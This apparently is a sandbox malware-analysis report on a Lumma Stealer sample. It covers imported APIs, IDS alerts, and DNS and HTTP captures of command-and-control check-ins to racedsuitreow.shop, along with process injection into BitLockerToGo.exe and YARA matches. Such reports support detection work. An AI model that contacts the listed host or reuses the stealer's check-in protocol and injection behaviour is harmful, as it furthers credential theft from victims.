                                        KERNEL32.dllAddAtomA, AddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreA, CreateThread, CreateWaitableTimerExW, DeleteAtom, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, FormatMessageA, FreeEnvironmentStringsW, GetAtomNameA, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetHandleInformation, GetLastError, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RaiseFailFastException, ReleaseMutex, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetLastError, SetProcessAffinityMask, SetProcessPriorityBoost, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
                                        msvcrt.dll___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _lock, _memccpy, _onexit, _setjmp, _strdup, _ultoa, _unlock, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, longjmp, malloc, memcpy, memmove, memset, printf, realloc, signal, strerror, strlen, strncmp, vfprintf, wcslen
                                        NameOrdinalAddress
                                        _cgo_dummy_export10x141267b50
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-09-26T10:00:12.767379+02002056078ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop)1192.168.2.7594761.1.1.153UDP
                                        2024-09-26T10:00:13.288579+02002056079ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)1192.168.2.749704104.21.37.97443TCP
                                        2024-09-26T10:00:13.443829+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749704104.21.37.97443TCP
                                        2024-09-26T10:00:13.443829+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749704104.21.37.97443TCP
                                        2024-09-26T10:00:14.339044+02002056079ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)1192.168.2.749705104.21.37.97443TCP
                                        2024-09-26T10:00:14.794278+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749705104.21.37.97443TCP
                                        2024-09-26T10:00:14.794278+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749705104.21.37.97443TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 26, 2024 10:00:12.792633057 CEST49704443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:12.792669058 CEST44349704104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:12.792757034 CEST49704443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:12.796319008 CEST49704443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:12.796339989 CEST44349704104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:13.288496971 CEST44349704104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:13.288578987 CEST49704443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:13.292030096 CEST49704443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:13.292040110 CEST44349704104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:13.292427063 CEST44349704104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:13.332801104 CEST49704443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:13.339515924 CEST49704443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:13.339533091 CEST49704443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:13.339678049 CEST44349704104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:13.443897963 CEST44349704104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:13.444001913 CEST44349704104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:13.444237947 CEST49704443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:13.444252014 CEST44349704104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:13.448348999 CEST44349704104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:13.448538065 CEST44349704104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:13.448630095 CEST49704443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:13.483529091 CEST49704443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:13.483552933 CEST44349704104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:13.863675117 CEST49705443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:13.863717079 CEST44349705104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:13.863822937 CEST49705443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:13.870511055 CEST49705443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:13.870527983 CEST44349705104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:14.338871002 CEST44349705104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:14.339044094 CEST49705443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:14.340851068 CEST49705443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:14.340861082 CEST44349705104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:14.341238976 CEST44349705104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:14.343641996 CEST49705443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:14.343682051 CEST49705443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:14.343759060 CEST44349705104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:14.794358015 CEST44349705104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:14.794650078 CEST44349705104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:14.794733047 CEST49705443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:14.794869900 CEST49705443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:14.794892073 CEST44349705104.21.37.97192.168.2.7
                                        Sep 26, 2024 10:00:14.794922113 CEST49705443192.168.2.7104.21.37.97
                                        Sep 26, 2024 10:00:14.794928074 CEST44349705104.21.37.97192.168.2.7
                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 26, 2024 10:00:12.744628906 CEST5711953192.168.2.71.1.1.1
                                        Sep 26, 2024 10:00:12.754252911 CEST53571191.1.1.1192.168.2.7
                                        Sep 26, 2024 10:00:12.767379045 CEST5947653192.168.2.71.1.1.1
                                        Sep 26, 2024 10:00:12.785046101 CEST53594761.1.1.1192.168.2.7
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Sep 26, 2024 10:00:12.744628906 CEST192.168.2.71.1.1.10xc3adStandard query (0)pianoswimen.shopA (IP address)IN (0x0001)false
                                        Sep 26, 2024 10:00:12.767379045 CEST192.168.2.71.1.1.10xaf16Standard query (0)racedsuitreow.shopA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Sep 26, 2024 10:00:12.754252911 CEST1.1.1.1192.168.2.70xc3adName error (3)pianoswimen.shopnonenoneA (IP address)IN (0x0001)false
                                        Sep 26, 2024 10:00:12.785046101 CEST1.1.1.1192.168.2.70xaf16No error (0)racedsuitreow.shop104.21.37.97A (IP address)IN (0x0001)false
                                        Sep 26, 2024 10:00:12.785046101 CEST1.1.1.1192.168.2.70xaf16No error (0)racedsuitreow.shop172.67.206.221A (IP address)IN (0x0001)false
                                        • racedsuitreow.shop
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.749704104.21.37.974437784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                        TimestampBytes transferredDirectionData
                                        2024-09-26 08:00:13 UTC265OUTPOST /api HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                        Content-Length: 8
                                        Host: racedsuitreow.shop
                                        2024-09-26 08:00:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                        Data Ascii: act=life
                                        2024-09-26 08:00:13 UTC555INHTTP/1.1 200 OK
                                        Date: Thu, 26 Sep 2024 08:00:13 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Frame-Options: SAMEORIGIN
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rUpAmCRClk0MKiuYJi%2BymvKBdPj9zmmc2N0PjDLW3gxJBS9AYAH7IT97GXaAAJQ4CdtEbcMfnpfX4CujuFQ30h78%2FmTRmB5hHpK0M7u%2FAPNHTi%2BdrvUHsbh4t7UJpoMS18%2BEZxM%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c91b813a8211819-EWR
                                        2024-09-26 08:00:13 UTC814INData Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                        Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                        2024-09-26 08:00:13 UTC1369INData Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27
                                        Data Ascii: les/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('
                                        2024-09-26 08:00:13 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 69 55 63 4b 32 36 38 55 6d 73 6b 4a 37 42 6f 6f 54 51 52 43 66 4d 55 62 6c 73 2e 68 67 30 35 49 65 45 33 5a 38 69 5a 36 6f 62 34 2d 31 37 32 37 33 33 37 36 31 33 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e
                                        Data Ascii: <input type="hidden" name="atok" value="iUcK268UmskJ7BooTQRCfMUbls.hg05IeE3Z8iZ6ob4-1727337613-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn
                                        2024-09-26 08:00:13 UTC853INData Raw: 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72
                                        Data Ascii: or sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflar
                                        2024-09-26 08:00:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.749705104.21.37.974437784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                        TimestampBytes transferredDirectionData
                                        2024-09-26 08:00:14 UTC355OUTPOST /api HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Cookie: __cf_mw_byp=iUcK268UmskJ7BooTQRCfMUbls.hg05IeE3Z8iZ6ob4-1727337613-0.0.1.1-/api
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                        Content-Length: 80
                                        Host: racedsuitreow.shop
                                        2024-09-26 08:00:14 UTC80OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 72 75 69 31 31 31 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63
                                        Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--rui111&j=5c9b8674a630d9101b46733aa37f15ec
                                        2024-09-26 08:00:14 UTC806INHTTP/1.1 200 OK
                                        Date: Thu, 26 Sep 2024 08:00:14 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Set-Cookie: PHPSESSID=4q38unb6hmm56ovvhjaq9829u2; expires=Mon, 20 Jan 2025 01:46:53 GMT; Max-Age=9999999; path=/
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Pragma: no-cache
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6EowK0SmpHVqBcBfeGDxb8lPAXeoynpOWjW4J3e35NTREELKd6e37GqS2ey8Ol8xGtsQtXjol7xw0YKMIL8%2BBADJV8Sh%2FqBzT%2F%2BkSyUUTvNpI1io%2FwuvFpdzjo5NxU7ad1Embvg%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8c91b81a2fcc42c8-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-09-26 08:00:14 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                        Data Ascii: aerror #D12
                                        2024-09-26 08:00:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:1
                                        Start time:03:59:31
                                        Start date:26/09/2024
                                        Path:C:\Users\user\Desktop\p37SE6gM52.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\p37SE6gM52.exe"
                                        Imagebase:0x7ff6fc380000
                                        File size:19'140'096 bytes
                                        MD5 hash:CD68144879CF39BEFD5D96950A78370D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000001.00000000.1324374308.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000001.00000002.1728658450.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:4
                                        Start time:05:06:03
                                        Start date:26/09/2024
                                        Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                        Imagebase:0x480000
                                        File size:231'736 bytes
                                        MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:1.6%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:65.6%
                                          Total number of Nodes:128
                                          Total number of Limit Nodes:29
                                          execution_graph 19697 2ae076f 19698 2ae077b 19697->19698 19701 2ae02d0 19697->19701 19699 2ae037b 19700 2b14f90 RtlAllocateHeap RtlFreeHeap 19700->19701 19701->19697 19701->19699 19701->19700 19767 2b11f20 19768 2b11f76 RtlAllocateHeap 19767->19768 19769 2b11f42 19767->19769 19769->19768 19770 2b18bc0 19772 2b18bd0 19770->19772 19771 2b18d1e 19772->19771 19774 2b15510 LdrInitializeThunk 19772->19774 19774->19771 19702 2b0de76 19703 2b0de80 19702->19703 19704 2b0deb2 CoCreateInstance 19702->19704 19705 2b0dedc 19702->19705 19707 2b0dee1 19702->19707 19703->19704 19704->19705 19704->19707 19706 2b0e4cf GetVolumeInformationW 19705->19706 19706->19707 19709 2b0e4f5 19706->19709 19708 2b0e54f SysAllocString 19710 2b0e5d2 19708->19710 19711 2b0e5ff SysAllocString 19708->19711 19709->19708 19710->19711 19714 2b0e61a 19711->19714 19712 2b0e68f SysAllocString 19713 2b0e620 SysAllocString 19712->19713 19712->19714 19713->19714 19714->19712 19714->19713 19775 2b14e47 19776 2b14ec6 LoadLibraryExW 19775->19776 19778 2b14e94 19775->19778 19777 2b14edd 19776->19777 19778->19776 19779 2b0dee8 19780 2b0def9 19779->19780 19781 2b0e243 SysFreeString SysFreeString 19779->19781 19783 2b0e201 19780->19783 19784 2b0df62 VariantInit 19780->19784 19785 2b0dffa SysStringLen 19780->19785 19791 2b0e01d 19780->19791 19782 2b0e499 SysFreeString 19781->19782 19787 2b0e258 19781->19787 19789 2b0e4b6 19782->19789 19783->19781 19788 2b0dfac 19784->19788 19785->19791 19788->19783 19788->19785 19788->19791 19790 2b0e4cf GetVolumeInformationW 19789->19790 19790->19787 19793 2b0e4f5 19790->19793 19792 2b0e54f SysAllocString 19794 2b0e5d2 19792->19794 19795 2b0e5ff SysAllocString 19792->19795 19793->19792 19794->19795 19798 2b0e61a 19795->19798 19796 2b0e68f SysAllocString 19797 2b0e620 SysAllocString 19796->19797 19796->19798 19797->19798 19798->19796 19798->19797 19799 2b0e468 19800 2b0e4a4 SysFreeString 19799->19800 19801 2b0e474 CoSetProxyBlanket 19799->19801 19802 2b0e499 19799->19802 19805 2b0e4f5 19799->19805 19811 2b0e61a 19799->19811 19809 2b0e4b6 19800->19809 19801->19802 19801->19805 19801->19811 19802->19800 19803 2b0e54f SysAllocString 19806 2b0e5d2 19803->19806 19807 2b0e5ff SysAllocString 19803->19807 19804 2b0e68f SysAllocString 19808 2b0e620 SysAllocString 19804->19808 19804->19811 19805->19803 19806->19807 19807->19811 19808->19811 19810 2b0e4cf GetVolumeInformationW 19809->19810 19810->19805 19812 2b0e258 19810->19812 19811->19804 19811->19808 19813 2b156c9 19814 2b156ce 19813->19814 19816 2b15510 LdrInitializeThunk 19814->19816 19817 2b157ff 19814->19817 19818 2b15797 19814->19818 19819 2b15761 19814->19819 19830 2b16080 19814->19830 19816->19814 19818->19817 19818->19819 19827 2b15510 LdrInitializeThunk 19818->19827 19823 2b15bce 19819->19823 19828 2b15510 LdrInitializeThunk 19819->19828 19822 2b15f2e 19822->19817 19829 2b15510 LdrInitializeThunk 19822->19829 19823->19817 19823->19822 19837 2b15510 LdrInitializeThunk 19823->19837 19826 2b15ff7 19827->19819 19828->19823 19829->19826 19833 2b15ebc 19830->19833 19831 2b15e9f 19831->19814 19832 2b15f2e 19832->19831 19838 2b15510 LdrInitializeThunk 19832->19838 19833->19831 19833->19832 19839 2b15510 LdrInitializeThunk 19833->19839 19836 2b15ff7 19837->19822 19838->19836 19839->19832 19715 2ae1d87 19717 2ae1d91 19715->19717 19723 2ae0000 19717->19723 19718 2ae2317 19719 2ae21c3 GetSystemDirectoryW 19721 2ae218f 19719->19721 19720 2ae21b0 CoUninitialize 19720->19718 19721->19718 19721->19719 19721->19720 19729 2b11fa0 19721->19729 19724 2adfee2 19723->19724 19725 2adff0b 19724->19725 19728 2adff1b 19724->19728 19733 2b14f90 19724->19733 19727 2b14f90 2 API calls 19725->19727 19727->19728 19728->19721 19730 2b12020 19729->19730 19732 2b11fb6 19729->19732 19730->19730 19731 2b11ff6 RtlFreeHeap 19731->19730 19732->19731 19734 2b15041 19733->19734 19736 2b14fab 19733->19736 19739 2b11f20 19734->19739 19737 2b11fa0 RtlFreeHeap 19736->19737 19738 2b14fb9 19736->19738 19737->19738 19738->19725 19740 2b11f76 RtlAllocateHeap 19739->19740 19741 2b11f42 19739->19741 19740->19738 19741->19740 19840 2b0e349 19841 2b0e384 19840->19841 19842 2b0e3af SysAllocString 19840->19842 19841->19842 19843 2b0e3d3 19842->19843 19843->19843 19742 2ae1d65 CoInitializeSecurity 19743 2adcd20 19744 2adcd29 19743->19744 19745 2adcf0e ExitProcess 19744->19745 19746 2adcd31 GetInputState 19744->19746 19747 2adcd3e 19746->19747 19748 2adcf09 19747->19748 19749 2adcd46 GetCurrentThreadId GetCurrentProcessId 19747->19749 19762 2b14f70 19748->19762 19753 2adcd78 19749->19753 19752 2adcefb 19752->19748 19761 2ae1d40 CoInitialize 19752->19761 19757 2ade8d0 19753->19757 19758 2ade906 19757->19758 19759 2ade9b6 LoadLibraryExW 19758->19759 19760 2ade9cb 19759->19760 19760->19752 19765 2b16620 19762->19765 19764 2b14f75 FreeLibrary 19764->19745 19766 2b16629 19765->19766 19766->19764

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 2b0e468-2b0e46d 1 2b0e4a4-2b0e4ee SysFreeString call 2b18120 GetVolumeInformationW 0->1 2 2b0e474-2b0e492 CoSetProxyBlanket 0->2 3 2b0e4f5 0->3 4 2b0e648-2b0e669 0->4 5 2b0e499-2b0e4a0 0->5 6 2b0e4fe-2b0e51f 0->6 1->3 30 2b0e270-2b0e279 1->30 31 2b0e280-2b0e28e 1->31 32 2b0e310-2b0e31d 1->32 33 2b0e2a3-2b0e2db call 2b056b0 1->33 34 2b0e324-2b0e333 1->34 35 2b0e295-2b0e2a1 1->35 36 2b0e258-2b0e269 1->36 37 2b0e33a-2b0e341 1->37 2->3 2->4 2->5 2->6 3->6 9 2b0e66b 4->9 10 2b0e68f-2b0e711 SysAllocString 4->10 5->1 7 2b0e521 6->7 8 2b0e54f-2b0e5d0 SysAllocString 6->8 11 2b0e530-2b0e54d call 2b11cc0 7->11 13 2b0e5d2 8->13 14 2b0e5ff-2b0e61a SysAllocString 8->14 12 2b0e670-2b0e68d call 2b11cc0 9->12 15 2b0e620-2b0e63b SysAllocString 10->15 16 2b0e717 10->16 11->8 12->10 20 2b0e5e0-2b0e5fd call 2b11d50 13->20 14->4 24 2b0e63f 15->24 21 2b0e720-2b0e73d call 2b11d50 16->21 20->14 41 2b0e73f 21->41 24->4 30->31 30->32 30->33 30->34 30->35 31->32 31->33 31->34 31->35 32->32 32->34 43 2b0e2e0-2b0e2e7 33->43 34->30 34->31 34->32 34->33 34->34 34->35 34->37 35->33 36->30 36->31 36->32 36->33 36->34 36->35 36->37 41->15 43->43 44 2b0e2e9-2b0e302 43->44 44->32 44->34
                                          APIs
                                          • CoSetProxyBlanket.COMBASE(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02B0E487
                                          • SysFreeString.OLEAUT32(?), ref: 02B0E4A5
                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02B0E4E2
                                          • SysAllocString.OLEAUT32(1D281F20), ref: 02B0E550
                                          • SysAllocString.OLEAUT32(131215E0), ref: 02B0E600
                                          • SysAllocString.OLEAUT32(131215E0), ref: 02B0E621
                                          • SysAllocString.OLEAUT32(?), ref: 02B0E698
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1744436369.0000000002AD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_2ad0000_BitLockerToGo.jbxd
                                          Similarity
                                          • API ID: String$Alloc$BlanketFreeInformationProxyVolume
                                          • String ID: ^+g)$f'G%$q?S=$y/Y-$z#u!
                                          • API String ID: 1389576922-909205317
                                          • Opcode ID: 47313f61327f61a6cefbd013ee38c27fddf99e0da1de57d4dae7c8e3f7ffe4b1
                                          • Instruction ID: 7b96319de5f7b953794ac63b924ff2467cd896f72219df8d56a9d4b93f4c49e3
                                          • Opcode Fuzzy Hash: 47313f61327f61a6cefbd013ee38c27fddf99e0da1de57d4dae7c8e3f7ffe4b1
                                          • Instruction Fuzzy Hash: 8BB188B4640701DFD7258F68D884B16BBB2FF49340F648A9CE9868B791D335E861CF94

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
